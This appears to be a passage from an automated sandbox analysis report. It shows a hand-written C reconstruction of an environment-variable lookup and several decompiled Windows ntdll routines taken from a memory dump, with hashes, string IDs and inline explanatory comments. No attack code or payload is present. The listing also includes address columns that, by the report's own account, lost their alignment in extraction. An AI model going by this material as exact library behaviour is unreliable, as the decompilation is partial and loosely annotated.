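    out[pos++] = 0;                     /* empty string terminates the block */
    return pos;
}

/* Run one lookup against the constructed block; ascii_out (129 bytes) is optional. */
static NTSTATUS32 sample_query(const char *name, size_t value_cap, char *ascii_out, size_t *ret_len)
{
    WCHAR16 env[256], wname[64], value[128];
    size_t nlen = strlen(name);
    if (nlen > 64) nlen = 64;
    if (value_cap > 128) value_cap = 128;
    build_env(SAMPLE_ENV, SAMPLE_N, env, 256);
    for (size_t i = 0; i < nlen; i++) wname[i] = (WCHAR16)(unsigned char)name[i];
    NTSTATUS32 st = env_query(env, wname, nlen, value, value_cap, ret_len);
    if (ascii_out) {
        size_t i = 0;
        if (st == STATUS_SUCCESS) for (; value[i]; i++) ascii_out[i] = (char)value[i];
        ascii_out[i] = 0;
    }
    return st;
}

NTSTATUS32 sample_status(const char *name, size_t value_cap)
{ size_t rl; return sample_query(name, value_cap, NULL, &rl); }

size_t sample_ret_len(const char *name)
{ size_t rl; sample_query(name, 128, NULL, &rl); return rl; }

int sample_value_is(const char *name, const char *expected)
{ char buf[129]; size_t rl; return sample_query(name, 128, buf, &rl) == STATUS_SUCCESS && strcmp(buf, expected) == 0; }

int main(void)
{
    char v[129]; size_t rl;
    NTSTATUS32 st = sample_query("path", 128, v, &rl);
    printf("path   -> 0x%08X \"%s\" (%zu code units)\n", st, v, rl);
    st = sample_query("TEMP", 3, v, &rl);
    printf("TEMP   -> 0x%08X with a 3-unit buffer, %zu units needed\n", st, rl);
    st = sample_query("NOSUCH", 128, v, &rl);
    printf("NOSUCH -> 0x%08X\n", st);
    return 0;
}
```

The length-before-contents ordering is what makes the table walk in the listing cheap: most candidates are rejected on a single integer compare, and only an exact-length match pays for the string comparison. The drive-letter entry shows why the scan for '=' must skip position 0; a naive split on the first '=' would give those entries an empty name.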
                                              (Instruction address column of the listing above: 0x01912584 to 0x01912984 in the main body, with out-of-line blocks at 0x01955afd to 0x01955c79. The per-statement pairing was lost in extraction, so only the address ranges are kept here.)
                                              0x01912985
                                              0x01912986
                                              0x01912987
                                              0x01912988
                                              0x01912989
                                              0x0191298a
                                              0x0191298b
                                              0x0191298c
                                              0x0191298d
                                              0x0191298e
                                              0x0191298f
                                              0x01912990
                                              0x01912992
                                              0x01912997
                                              0x019129a3
                                              0x019129a6
                                              0x019129ab
                                              0x019129ad
                                              0x019129b0
                                              0x019129b2
                                              0x01955c80
                                              0x019129b8
                                              0x019129b8
                                              0x019129bb
                                              0x019129c0
                                              0x019129c5
                                              0x019129c6
                                              0x019129c6
                                              0x019129c9
                                              0x019129cb
                                              0x00000000
                                              0x00000000
                                              0x019129cd
                                              0x019129d0
                                              0x019129d9
                                              0x019129db
                                              0x019129dd
                                              0x01912a7f
                                              0x01912a84
                                              0x01912a87
                                              0x01912a89
                                              0x01955ca1
                                              0x01955ca3
                                              0x00000000
                                              0x01912a8f
                                              0x01912a8f
                                              0x00000000
                                              0x01912a8f
                                              0x00000000
                                              0x019129e3
                                              0x019129e3
                                              0x019129e3
                                              0x00000000
                                              0x019129e3
                                              0x019129dd
                                              0x00000000
                                              0x019129db
                                              0x019129e6
                                              0x019129e9
                                              0x019129eb
                                              0x019129ed
                                              0x019129f3
                                              0x019129f5
                                              0x019129f8
                                              0x019129fa
                                              0x01912a97
                                              0x01912a9a
                                              0x01912a9d
                                              0x01912add
                                              0x00000000
                                              0x01912a9f
                                              0x01912aa2
                                              0x01912aa5
                                              0x01912aa8
                                              0x01912aab
                                              0x01955cab
                                              0x01955caf
                                              0x01955cc5
                                              0x01955cda
                                              0x01955cdc
                                              0x01955cdf
                                              0x01955ce5
                                              0x00000000
                                              0x01955ceb
                                              0x01955ced
                                              0x01955cee
                                              0x00000000
                                              0x01955cee
                                              0x01955cb1
                                              0x01955cb4
                                              0x01955cb9
                                              0x01955cbb
                                              0x00000000
                                              0x01955cbd
                                              0x01955cbd
                                              0x00000000
                                              0x01955cbd
                                              0x01955cbb
                                              0x01912ab1
                                              0x01912ab1
                                              0x01912ac4
                                              0x01912ac6
                                              0x01912ac6
                                              0x00000000
                                              0x01912ac6
                                              0x01912aab
                                              0x00000000
                                              0x01912a00
                                              0x01912a09
                                              0x01912a0e
                                              0x01912a21
                                              0x01912a24
                                              0x01912a35
                                              0x01912a3a
                                              0x01912a3d
                                              0x01912a42
                                              0x01912a59
                                              0x01912a59
                                              0x01912a5c
                                              0x01912a5f
                                              0x01912a5f
                                              0x019129fa
                                              0x019129f3
                                              0x01912a64
                                              0x01912a64
                                              0x01912a6b
                                              0x01912a6b
                                              0x01912a6d
                                              0x01912a72
                                              0x01912a72
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                              • Instruction ID: dbf95d760dc5feed9ef1df4068e5182907fc5bcf5a52a0639845f21fae2a1479
                                              • Opcode Fuzzy Hash: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                              • Instruction Fuzzy Hash: 1DC1B371E00219DFDB25EF99D880BBEBBB5FF48740F244429E909BB254D734A981CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 80%
                                              			E0191FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                              				char _v5;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				char _v16;
                                              				char _v17;
                                              				char _v20;
                                              				signed int _v24;
                                              				char _v28;
                                              				char _v32;
                                              				signed int _v40;
                                              				void* __ecx;
                                              				void* __edi;
                                              				void* __ebp;
                                              				signed int _t73;
                                              				intOrPtr* _t75;
                                              				signed int _t77;
                                              				signed int _t79;
                                              				signed int _t81;
                                              				intOrPtr _t83;
                                              				intOrPtr _t85;
                                              				intOrPtr _t86;
                                              				signed int _t91;
                                              				signed int _t94;
                                              				signed int _t95;
                                              				signed int _t96;
                                              				signed int _t106;
                                              				signed int _t108;
                                              				signed int _t114;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed int _t122;
                                              				signed int _t123;
                                              				void* _t129;
                                              				signed int _t130;
                                              				void* _t132;
                                              				intOrPtr* _t134;
                                              				signed int _t138;
                                              				signed int _t141;
                                              				signed int _t147;
                                              				intOrPtr _t153;
                                              				signed int _t154;
                                              				signed int _t155;
                                              				signed int _t170;
                                              				void* _t174;
                                              				signed int _t176;
                                              				signed int _t177;
                                              
                                              				_t129 = __ebx;
                                              				_push(_t132);
                                              				_push(__esi);
                                              				_t174 = _t132;
                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                              				if(_t73 >= 0) {
                                              					L5:
                                              					return _t73;
                                              				} else {
                                              					E018FEEF0(0x19d7b60);
                                              					_t134 =  *0x19d7b84; // 0x776f7b80
                                              					_t2 = _t174 + 0x24; // 0x24
                                              					_t75 = _t2;
                                              					if( *_t134 != 0x19d7b80) { // LIST_ENTRY consistency check: head.Blink->Flink must point back at the head (0x19d7b80); a mismatch means the list is corrupt
                                              						_push(3); // 3 == FAST_FAIL_CORRUPT_LIST_ENTRY
                                              						asm("int 0x29"); // __fastfail: the process is terminated immediately, no SEH dispatch and no return
                                              						asm("int3"); // int3 run below is inter-function padding, unreachable after __fastfail
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						_push(0x19d7b60); // the decompiler has run on past the padding into the next routine: flag validation for the UI-language API named in the assert string below
                                              						_t170 = _v8; // _t170 holds the caller's flags for the rest of the routine
                                              						_v28 = 0;
                                              						_v40 = 0;
                                              						_v24 = 0;
                                              						_v17 = 0;
                                              						_v32 = 0;
                                              						__eflags = _t170 & 0xffff7cf2;
                                              						if((_t170 & 0xffff7cf2) != 0) { // any bit outside the accepted flag set (0x1, 0x4, 0x8, 0x100, 0x200, 0x8000) is rejected
                                              							L43:
                                              							_t77 = 0xc000000d; // STATUS_INVALID_PARAMETER
                                              						} else {
                                              							_t79 = _t170 & 0x0000000c;
                                              							__eflags = _t79;
                                              							if(_t79 != 0) {
                                              								__eflags = _t79 - 0xc;
                                              								if(_t79 == 0xc) { // MUI_LANGUAGE_ID (0x4) and MUI_LANGUAGE_NAME (0x8) may not be combined
                                              									goto L43;
                                              								} else {
                                              									goto L9;
                                              								}
                                              							} else {
                                              								_t170 = _t170 | 0x00000008;
                                              								__eflags = _t170;
                                              								L9:
                                              								_t81 = _t170 & 0x00000300;
                                              								__eflags = _t81 - 0x300;
                                              								if(_t81 == 0x300) { // MUI_CONSOLE_FILTER (0x100) and MUI_COMPLEX_SCRIPT_FILTER (0x200) may not be combined; bit 0x1 (MUI_RESET_FILTERS) below may not be combined with either filter
                                              									goto L43;
                                              								} else {
                                              									_t138 = _t170 & 0x00000001;
                                              									__eflags = _t138;
                                              									_v24 = _t138;
                                              									if(_t138 != 0) {
                                              										__eflags = _t81;
                                              										if(_t81 != 0) {
                                              											goto L43;
                                              										} else {
                                              											goto L11;
                                              										}
                                              									} else {
                                              										L11:
                                              										_push(_t129);
                                              										_t77 = E018F6D90( &_v20);
                                              										_t130 = _t77;
                                              										__eflags = _t130;
                                              										if(_t130 >= 0) {
                                              											_push(_t174);
                                              											__eflags = _t170 & 0x00000301;
                                              											if((_t170 & 0x00000301) == 0) {
                                              												_t176 = _a8;
                                              												__eflags = _t176;
                                              												if(__eflags == 0) {
                                              													L64:
                                              													_t83 =  *[fs:0x18]; // fs:[0x18] is the x86 TEB self-pointer; +0xfb8/+0xfbc/+0xfc0 are per-thread slots this routine reads and writes
                                              													_t177 = 0;
                                              													__eflags =  *(_t83 + 0xfb8);
                                              													if( *(_t83 + 0xfb8) != 0) {
                                              														E018F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                              													}
                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                              													goto L15;
                                              												} else {
                                              													asm("sbb edx, edx");
                                              													_t114 = E01988938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                              													__eflags = _t114;
                                              													if(_t114 < 0) {
                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                              														E018EB150();
                                              													}
                                              													_t116 = E01986D81(_t176,  &_v16);
                                              													__eflags = _t116;
                                              													if(_t116 >= 0) {
                                              														__eflags = _v16 - 2;
                                              														if(_v16 < 2) {
                                              															L56:
                                              															_t118 = E018F75CE(_v20, 5, 0);
                                              															__eflags = _t118;
                                              															if(_t118 < 0) {
                                              																L67:
                                              																_t130 = 0xc0000017; // STATUS_NO_MEMORY
                                              																goto L32;
                                              															} else {
                                              																__eflags = _v12;
                                              																if(_v12 == 0) {
                                              																	goto L67;
                                              																} else {
                                              																	_t153 =  *0x19d8638; // 0x0
                                              																	_t122 = L018F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                              																	_t154 = _v12;
                                              																	_t130 = _t122;
                                              																	__eflags = _t130;
                                              																	if(_t130 >= 0) {
                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                              																		__eflags = _t123;
                                              																		if(_t123 != 0) {
                                              																			_t155 = _a12;
                                              																			__eflags = _t155;
                                              																			if(_t155 != 0) {
                                              																				 *_t155 = _t123;
                                              																			}
                                              																			goto L64;
                                              																		} else {
                                              																			E018F76E2(_t154);
                                              																			goto L41;
                                              																		}
                                              																	} else {
                                              																		E018F76E2(_t154);
                                              																		_t177 = 0;
                                              																		goto L18;
                                              																	}
                                              																}
                                              															}
                                              														} else {
                                              															__eflags =  *_t176;
                                              															if( *_t176 != 0) {
                                              																goto L56;
                                              															} else {
                                              																__eflags =  *(_t176 + 2);
                                              																if( *(_t176 + 2) == 0) {
                                              																	goto L64;
                                              																} else {
                                              																	goto L56;
                                              																}
                                              															}
                                              														}
                                              													} else {
                                              														_t130 = 0xc000000d; // STATUS_INVALID_PARAMETER
                                              														goto L32;
                                              													}
                                              												}
                                              												goto L35;
                                              											} else {
                                              												__eflags = _a8;
                                              												if(_a8 != 0) {
                                              													_t77 = 0xc000000d; // STATUS_INVALID_PARAMETER: a filter flag was given together with a language buffer
                                              												} else {
                                              													_v5 = 1;
                                              													L0191FCE3(_v20, _t170);
                                              													_t177 = 0;
                                              													__eflags = 0;
                                              													L15:
                                              													_t85 =  *[fs:0x18];
                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                              														L18:
                                              														__eflags = _t130;
                                              														if(_t130 != 0) {
                                              															goto L32;
                                              														} else {
                                              															__eflags = _v5 - _t130;
                                              															if(_v5 == _t130) {
                                              																goto L32;
                                              															} else {
                                              																_t86 =  *[fs:0x18];
                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                              																}
                                              																__eflags = _t177;
                                              																if(_t177 == 0) {
                                              																	L31:
                                              																	__eflags = 0;
                                              																	L018F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                              																	goto L32;
                                              																} else {
                                              																	__eflags = _v24;
                                              																	_t91 =  *(_t177 + 0x20);
                                              																	if(_v24 != 0) {
                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                              																		goto L31;
                                              																	} else {
                                              																		_t141 = _t91 & 0x00000040;
                                              																		__eflags = _t170 & 0x00000100;
                                              																		if((_t170 & 0x00000100) == 0) {
                                              																			__eflags = _t141;
                                              																			if(_t141 == 0) {
                                              																				L74:
                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                              																				goto L27;
                                              																			} else {
                                              																				_t177 = E0191FD22(_t177);
                                              																				__eflags = _t177;
                                              																				if(_t177 == 0) {
                                              																					goto L42;
                                              																				} else {
                                              																					_t130 = E0191FD9B(_t177, 0, 4);
                                              																					__eflags = _t130;
                                              																					if(_t130 != 0) {
                                              																						goto L42;
                                              																					} else {
                                              																						_t68 = _t177 + 0x20;
                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                              																						__eflags =  *_t68;
                                              																						_t91 =  *(_t177 + 0x20);
                                              																						goto L74;
                                              																					}
                                              																				}
                                              																			}
                                              																			goto L35;
                                              																		} else {
                                              																			__eflags = _t141;
                                              																			if(_t141 != 0) {
                                              																				_t177 = E0191FD22(_t177);
                                              																				__eflags = _t177;
                                              																				if(_t177 == 0) {
                                              																					L42:
                                              																					_t77 = 0xc0000001;
                                              																					goto L33;
                                              																				} else {
                                              																					_t130 = E0191FD9B(_t177, 0, 4);
                                              																					__eflags = _t130;
                                              																					if(_t130 != 0) {
                                              																						goto L42;
                                              																					} else {
                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                              																						_t91 =  *(_t177 + 0x20);
                                              																						goto L26;
                                              																					}
                                              																				}
                                              																				goto L35;
                                              																			} else {
                                              																				L26:
                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                              																				__eflags = _t94;
                                              																				L27:
                                              																				 *(_t177 + 0x20) = _t94;
                                              																				__eflags = _t170 & 0x00008000;
                                              																				if((_t170 & 0x00008000) != 0) {
                                              																					_t95 = _a12;
                                              																					__eflags = _t95;
                                              																					if(_t95 != 0) {
                                              																						_t96 =  *_t95;
                                              																						__eflags = _t96;
                                              																						if(_t96 != 0) {
                                              																							 *((short*)(_t177 + 0x22)) = 0;
                                              																							_t40 = _t177 + 0x20;
                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                              																							__eflags =  *_t40;
                                              																						}
                                              																					}
                                              																				}
                                              																				goto L31;
                                              																			}
                                              																		}
                                              																	}
                                              																}
                                              															}
                                              														}
                                              													} else {
                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                              														_t106 =  *(_t147 + 0x20);
                                              														__eflags = _t106 & 0x00000040;
                                              														if((_t106 & 0x00000040) != 0) {
                                              															_t147 = E0191FD22(_t147);
                                              															__eflags = _t147;
                                              															if(_t147 == 0) {
                                              																L41:
                                              																_t130 = 0xc0000001;
                                              																L32:
                                              																_t77 = _t130;
                                              																goto L33;
                                              															} else {
                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                              																_t106 =  *(_t147 + 0x20);
                                              																goto L17;
                                              															}
                                              															goto L35;
                                              														} else {
                                              															L17:
                                              															_t108 = _t106 | 0x00000080;
                                              															__eflags = _t108;
                                              															 *(_t147 + 0x20) = _t108;
                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                              															goto L18;
                                              														}
                                              													}
                                              												}
                                              											}
                                              											L33:
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L35:
                                              						return _t77;
                                              					} else {
                                              						 *_t75 = 0x19d7b80;
                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                              						 *_t134 = _t75;
                                              						 *0x19d7b84 = _t75;
                                              						_t73 = E018FEB70(_t134, 0x19d7b60);
                                              						if( *0x19d7b20 != 0) {
                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                              								_t73 = E018FFF60( *0x19d7b20);
                                              							}
                                              						}
                                              						goto L5;
                                              					}
                                              				}
                                              			}

                                              [Per-line instruction address column for the C-code above (addresses 0x0191fab0 to 0x0191fcdc, plus a second range 0x0195bdcb to 0x0195bf4b; 0x00000000 marks goto lines with no address). Its alignment with the individual C-code lines was lost in extraction.]

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0195BE0F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                              • Instruction ID: 46e524d7838cd40354de0170a648bb630ebe177daeef3ec55adbbc88dba26266
                                              • Opcode Fuzzy Hash: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                              • Instruction Fuzzy Hash: 8CA12371B0060E8BEB25DF6CC450B7AB7A9BF48711F04456DEE0EDB684DB34D9899B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 63%
                                              			E018E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                              				signed char _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				signed int _v52;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr _t55;
                                              				signed int _t57;
                                              				signed int _t58;
                                              				char* _t62;
                                              				signed char* _t63;
                                              				signed char* _t64;
                                              				signed int _t67;
                                              				signed int _t72;
                                              				signed int _t77;
                                              				signed int _t78;
                                              				signed int _t88;
                                              				intOrPtr _t89;
                                              				signed char _t93;
                                              				signed int _t97;
                                              				signed int _t98;
                                              				signed int _t102;
                                              				signed int _t103;
                                              				intOrPtr _t104;
                                              				signed int _t105;
                                              				signed int _t106;
                                              				signed char _t109;
                                              				signed int _t111;
                                              				void* _t116;
                                              
                                              				_t102 = __edi;
                                              				_t97 = __edx;
                                              				_v12 = _v12 & 0x00000000;
                                              				_t55 =  *[fs:0x18];
                                              				_t109 = __ecx;
                                              				_v8 = __edx;
                                              				_t86 = 0;
                                              				_v32 = _t55;
                                              				_v24 = 0;
                                              				_push(__edi);
                                              				if(__ecx == 0x19d5350) {
                                              					_t86 = 1;
                                              					_v24 = 1;
                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                              				}
                                              				_t103 = _t102 | 0xffffffff;
                                              				if( *0x19d7bc8 != 0) {
                                              					_push(0xc000004b);
                                              					_push(_t103);
                                              					E019297C0();
                                              				}
                                              				if( *0x19d79c4 != 0) {
                                              					_t57 = 0;
                                              				} else {
                                              					_t57 = 0x19d79c8;
                                              				}
                                              				_v16 = _t57;
                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                              					_t93 = _t109;
                                              					L23();
                                              				}
                                              				_t58 =  *_t109;
                                              				if(_t58 == _t103) {
                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                              					_t58 = _t103;
                                              					if(__eflags == 0) {
                                              						_t93 = _t109;
                                              						E01911624(_t86, __eflags);
                                              						_t58 =  *_t109;
                                              					}
                                              				}
                                              				_v20 = _v20 & 0x00000000;
                                              				if(_t58 != _t103) {
                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                              				}
                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                              				_t88 = _v16;
                                              				_v28 = _t104;
                                              				L9:
                                              				while(1) {
                                              					if(E01907D50() != 0) {
                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                              					} else {
                                              						_t62 = 0x7ffe0382;
                                              					}
                                              					if( *_t62 != 0) {
                                              						_t63 =  *[fs:0x30];
                                              						__eflags = _t63[0x240] & 0x00000002;
                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                              							_t93 = _t109;
                                              							E0197FE87(_t93);
                                              						}
                                              					}
                                              					if(_t104 != 0xffffffff) {
                                              						_push(_t88);
                                              						_push(0);
                                              						_push(_t104);
                                              						_t64 = E01929520();
                                              						goto L15;
                                              					} else {
                                              						while(1) {
                                              							_t97 =  &_v8;
                                              							_t64 = E0191E18B(_t109 + 4, _t97, 4, _t88, 0);
                                              							if(_t64 == 0x102) {
                                              								break;
                                              							}
                                              							_t93 =  *(_t109 + 4);
                                              							_v8 = _t93;
                                              							if((_t93 & 0x00000002) != 0) {
                                              								continue;
                                              							}
                                              							L15:
                                              							if(_t64 == 0x102) {
                                              								break;
                                              							}
                                              							_t89 = _v24;
                                              							if(_t64 < 0) {
                                              								L0193DF30(_t93, _t97, _t64);
                                              								_push(_t93);
                                              								_t98 = _t97 | 0xffffffff;
                                              								__eflags =  *0x19d6901;
                                              								_push(_t109);
                                              								_v52 = _t98;
                                              								if( *0x19d6901 != 0) {
                                              									_push(0);
                                              									_push(1);
                                              									_push(0);
                                              									_push(0x100003);
                                              									_push( &_v12);
                                              									_t72 = E01929980();
                                              									__eflags = _t72;
                                              									if(_t72 < 0) {
                                              										_v12 = _t98 | 0xffffffff;
                                              									}
                                              								}
                                              								asm("lock cmpxchg [ecx], edx");
                                              								_t111 = 0;
                                              								__eflags = 0;
                                              								if(0 != 0) {
                                              									__eflags = _v12 - 0xffffffff;
                                              									if(_v12 != 0xffffffff) {
                                              										_push(_v12);
                                              										E019295D0();
                                              									}
                                              								} else {
                                              									_t111 = _v12;
                                              								}
                                              								return _t111;
                                              							} else {
                                              								if(_t89 != 0) {
                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                              									_t77 = E01907D50();
                                              									__eflags = _t77;
                                              									if(_t77 == 0) {
                                              										_t64 = 0x7ffe0384;
                                              									} else {
                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                              									}
                                              									__eflags =  *_t64;
                                              									if( *_t64 != 0) {
                                              										_t64 =  *[fs:0x30];
                                              										__eflags = _t64[0x240] & 0x00000004;
                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                              											_t78 = E01907D50();
                                              											__eflags = _t78;
                                              											if(_t78 == 0) {
                                              												_t64 = 0x7ffe0385;
                                              											} else {
                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                              											}
                                              											__eflags =  *_t64 & 0x00000020;
                                              											if(( *_t64 & 0x00000020) != 0) {
                                              												_t64 = E01967016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                              											}
                                              										}
                                              									}
                                              								}
                                              								return _t64;
                                              							}
                                              						}
                                              						_t97 = _t88;
                                              						_t93 = _t109;
                                              						E0197FDDA(_t97, _v12);
                                              						_t105 =  *_t109;
                                              						_t67 = _v12 + 1;
                                              						_v12 = _t67;
                                              						__eflags = _t105 - 0xffffffff;
                                              						if(_t105 == 0xffffffff) {
                                              							_t106 = 0;
                                              							__eflags = 0;
                                              						} else {
                                              							_t106 =  *(_t105 + 0x14);
                                              						}
                                              						__eflags = _t67 - 2;
                                              						if(_t67 > 2) {
                                              							__eflags = _t109 - 0x19d5350;
                                              							if(_t109 != 0x19d5350) {
                                              								__eflags = _t106 - _v20;
                                              								if(__eflags == 0) {
                                              									_t93 = _t109;
                                              									E0197FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                              								}
                                              							}
                                              						}
                                              						_push("RTL: Re-Waiting\n");
                                              						_push(0);
                                              						_push(0x65);
                                              						_v20 = _t106;
                                              						E01975720();
                                              						_t104 = _v28;
                                              						_t116 = _t116 + 0xc;
                                              						continue;
                                              					}
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                              • Instruction ID: 5c6ef5bcd73afa90d6273beb1875a25975f4511caa9e6ebb0096507f017a2698
                                              • Opcode Fuzzy Hash: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                              • Instruction Fuzzy Hash: 1D614731E0061A9FEB32DB6CC844B7EBBEAEF85314F140669D919D72C2D7349A41C782
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 80%
                                              			E019B0EA5(void* __ecx, void* __edx) {
                                              				signed int _v20;
                                              				char _v24;
                                              				intOrPtr _v28;
                                              				unsigned int _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				char _v44;
                                              				intOrPtr _v64;
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed int _t58;
                                              				unsigned int _t60;
                                              				intOrPtr _t62;
                                              				char* _t67;
                                              				char* _t69;
                                              				void* _t80;
                                              				void* _t83;
                                              				intOrPtr _t93;
                                              				intOrPtr _t115;
                                              				char _t117;
                                              				void* _t120;
                                              
                                              				_t83 = __edx;
                                              				_t117 = 0;
                                              				_t120 = __ecx;
                                              				_v44 = 0;
                                              				if(E019AFF69(__ecx,  &_v44,  &_v32) < 0) {
                                              					L24:
                                              					_t109 = _v44;
                                              					if(_v44 != 0) {
                                              						E019B1074(_t83, _t120, _t109, _t117, _t117);
                                              					}
                                              					L26:
                                              					return _t117;
                                              				}
                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                              				_t5 = _t83 + 1; // 0x1
                                              				_v36 = _t5 << 0xc;
                                              				_v40 = _t93;
                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                              				asm("sbb ebx, ebx");
                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                              				if(_t58 != 0) {
                                              					_push(0);
                                              					_push(0x14);
                                              					_push( &_v24);
                                              					_push(3);
                                              					_push(_t93);
                                              					_push(0xffffffff);
                                              					_t80 = E01929730();
                                              					_t115 = _v64;
                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                              						_push(_t93);
                                              						E019AA80D(_t115, 1, _v20, _t117);
                                              						_t83 = 4;
                                              					}
                                              				}
                                              				if(E019AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                              					goto L24;
                                              				}
                                              				_t60 = _v32;
                                              				_t97 = (_t60 != 0x100000) + 1;
                                              				_t83 = (_v44 -  *0x19d8b04 >> 0x14) + (_v44 -  *0x19d8b04 >> 0x14);
                                              				_v28 = (_t60 != 0x100000) + 1;
                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                              				_v40 = _t62;
                                              				if(_t83 >= _t62) {
                                              					L10:
                                              					asm("lock xadd [eax], ecx");
                                              					asm("lock xadd [eax], ecx");
                                              					if(E01907D50() == 0) {
                                              						_t67 = 0x7ffe0380;
                                              					} else {
                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              					}
                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              						E019A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                              					}
                                              					if(E01907D50() == 0) {
                                              						_t69 = 0x7ffe0388;
                                              					} else {
                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              					}
                                              					if( *_t69 != 0) {
                                              						E0199FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                              					}
